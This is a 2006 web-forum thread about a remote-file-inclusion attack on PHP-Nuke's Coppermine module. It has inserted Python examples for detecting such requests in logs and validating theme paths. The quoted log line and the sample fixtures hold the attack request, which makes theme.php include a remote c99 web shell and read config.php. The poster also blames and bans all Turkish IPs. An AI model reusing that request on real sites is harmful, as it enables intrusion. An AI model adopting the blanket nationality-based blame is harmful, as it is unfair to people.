Jenses
New Member
Joined: Feb 15, 2006
Posts: 6
Posted: Thu Feb 16, 2006 1:59 pm
Got hacked by this kind of method (from my site's log):
Code:
85.97.105.136 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F&act=f&f=config.php&d=%2Fxxxx%2Fxxxx%2Fxxxx%2Fxxxxx%2Fdomain.dk& HTTP/1.1" 200 6224

(xxx are replacements for my actual path)
I do know that the theme.php was obsolete and apparently included some bug. This file is removed, but how can I know if there are other files like this one that will open a back door to my system?
My domain is Danish, so right now many Turkish hackers find it to be their right to hack me (Muhammad cartoons).
I can ban all Turkish IPs, but then they just let their relatives in Europe do it.
Isn't there a way to catch this kind of hack attempt?
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Thu Feb 16, 2006 2:01 pm
Get rid of Coppermine if you use nuke. We can't reiterate this enough. Just search the forums for information.
jaded
Theme Guru
Joined: Nov 01, 2003
Posts: 1006
Posted: Thu Feb 16, 2006 2:26 pm
Yes, more than likely, as Raven pointed out, it is Coppermine. Be sure that if you do remove it, you remove ALL of it. This has been discussed many, many times. Thanks and good luck!
Raven
Posted: Thu Feb 16, 2006 4:50 pm
Jenses, are you at patch level 2, 3, or 4 of NukeSentinel v2.4.2? The reason I ask is that I have code in there that would have stopped that.
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
Posted: Thu Feb 16, 2006 5:20 pm
Raven
Posted: Thu Feb 16, 2006 5:49 pm
XSS in includes/nukesentinel.php; pl2 I believe handles the hex, and there's other code to trap [link hidden by the board] in the url request.
evaders99
Posted: Thu Feb 16, 2006 10:24 pm
Alright, just curious if there is a way to detect such things directly. We could block all these robots trying various exploits for awstats, other Nuke forks, etc. I'm currently using DisError, so when it gets a 404, it passes through a page where I can filter on what they were trying to do.
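The question above is whether an attempt like the one in the first post can be picked out of the access log directly, rather than only from 404 pages. The following is an added example, not code from this thread, NukeSentinel or DisError. It parses Apache combined-format lines, percent-decodes every query parameter (repeatedly, so hex-encoded and double-encoded values are judged in the clear) and flags any parameter whose decoded value is a remote URL, which is what the THEME_DIR parameter in the logged request carried. The sample log is constructed: its first line reproduces the request quoted in the thread, the rest use reserved TEST-NET addresses and example.com. Note that the real request returned 200, so a filter that only looks at 404s, as described in the post, would not have seen it; the example records that as severity.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample of Apache combined-format access-log lines. The first line
# reproduces the request quoted in this thread; the other three are made up
# (TEST-NET addresses, example.com) to show a benign encoded request, a
# double-encoded variant of the same remote-include attempt, and a plain page hit.
SAMPLE_LOG = """\
85.97.105.136 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F&act=f&f=config.php&d=%2Fxxxx%2Fxxxx%2Fxxxx%2Fxxxxx%2Fdomain.dk& HTTP/1.1" 200 6224
192.0.2.10 - - [16/Feb/2006:01:22:01 +0100] "GET /modules.php?name=Search&query=%C3%A6ble HTTP/1.1" 200 8120
203.0.113.5 - - [16/Feb/2006:01:23:44 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%253A%252F%252Fexample.com%252Fx.txt%253F HTTP/1.1" 404 512
198.51.100.7 - - [16/Feb/2006:01:24:09 +0100] "GET /index.php HTTP/1.1" 200 4411
"""

# Apache combined format: client, identd, user, [timestamp], "request", status, size.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that starts with a URL scheme is a remote-include candidate.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are judged in the clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_include_params(target):
    """Return [(name, decoded_value)] for query parameters carrying a remote URL."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl decodes one layer of percent-encoding; decode_fully handles the rest.
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(value)
        if REMOTE_SCHEME.match(value):
            hits.append((name, value))
    return hits


def scan_access_log(text):
    """Return one alert dict per request whose query string points at a remote URL."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = remote_include_params(m.group("target"))
        if not hits:
            continue
        status = int(m.group("status"))
        alerts.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "script": urlsplit(m.group("target")).path,
            "status": status,
            "params": hits,
            # A 200 means the script executed with that parameter; a filter that
            # only inspects 404 responses would never see such a request.
            "severity": "likely-success" if status == 200 else "attempt",
        })
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"{alert['severity']:15} {alert['ip']:15} {alert['script']} "
              f"status={alert['status']} {alert['params']}")
```

Run against the real log with `scan_access_log(open("access_log").read())`; the returned list can be fed to a banning rule or a daily report. The decoded values are kept in the alert so a reviewer sees the actual URL that was supplied, not its hex form.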
Jenses
Posted: Fri Feb 17, 2006 3:10 am
Hi Raven,
I'm on the newest 2.4.2pl4 and have added the pc-killer.
I find it a little 'cheap' to say 'get rid of'. We should be able to detect vulnerabilities so code can be changed to stop exploits. I wonder if anyone has made a tool to test modules systematically for all known exploits?
Raven
Posted: Fri Feb 17, 2006 3:50 am
I actually have one started but I put it on the back burner. So, from me, at least, the answer is no.
Jenses
Posted: Fri Feb 17, 2006 7:22 am
Hope to see that one soon. In the meantime I add the normal "if (!defined('MODULE_FILE')) {..." to my third-party modules, and ban all Turkish IPs from my sites.
jaded
Posted: Fri Feb 17, 2006 7:52 am
That will not be enough to secure Coppermine. Most of us strongly suggest that you remove it entirely. Best of luck to you.
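The last two posts turn on whether the MODULE_FILE guard is enough. That guard only refuses a script that is called out of context; the request logged in the first post reached theme.php through a parameter that the script then used in an include, and a direct-access check does nothing about that. The following is an added example, not Coppermine's or PHP-Nuke's code, written in Python rather than PHP so it runs stand-alone; it models the validation a theme loader has to apply to a THEME_DIR-style value before using it: decode first, accept only a bare directory name from an allowlist of installed themes, and confirm the resolved path stays under the theme base. THEME_BASE and KNOWN_THEMES are assumptions for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed install path and a constructed allowlist of theme directories that
# exist on disk; a real loader would build the set from os.listdir(THEME_BASE).
THEME_BASE = "/var/www/html/modules/coppermine/themes"
KNOWN_THEMES = frozenset({"classic", "maze", "water_drop"})

# A theme is a bare directory name: letters, digits, underscore, hyphen. That
# rules out URL schemes, slashes, dots and percent sequences in one check.
THEME_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


class ThemeRejected(ValueError):
    """Raised when a request-supplied theme value must not reach an include."""


def resolve_theme_dir(raw_value, base=THEME_BASE, allowed=KNOWN_THEMES):
    """Map a request parameter to an absolute theme directory or raise ThemeRejected.

    Validation runs on the decoded value, so "http%3A%2F%2F..." is judged as
    "http://..." rather than slipping past a check that only sees raw bytes.
    """
    name = unquote(raw_value)
    if not THEME_NAME.fullmatch(name):
        raise ThemeRejected(f"theme name has forbidden characters: {name!r}")
    if name not in allowed:
        raise ThemeRejected(f"theme not installed: {name!r}")
    # Belt and braces: even after the character allowlist, confirm the resolved
    # path is inside the theme base before it is handed to an include.
    base = base.rstrip("/")
    path = posixpath.normpath(posixpath.join(base, name))
    if not path.startswith(base + "/"):
        raise ThemeRejected(f"theme path escapes base directory: {path}")
    return path


def classify(raw_value):
    """Convenience wrapper: (accepted, resolved path or rejection reason)."""
    try:
        return True, resolve_theme_dir(raw_value)
    except ThemeRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    # The value from the logged request, a theme that is not installed, and a valid one.
    for candidate in ("http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F", "sunset", "maze"):
        accepted, detail = classify(candidate)
        print(f"{'OK ' if accepted else 'REJ'} {candidate!r}: {detail}")
```

The allowlist is the part that matters: a loader that merely strips "http://" still includes whatever else the client sends, whereas one that only ever joins a known directory name onto its own base cannot be pointed at a remote file at all.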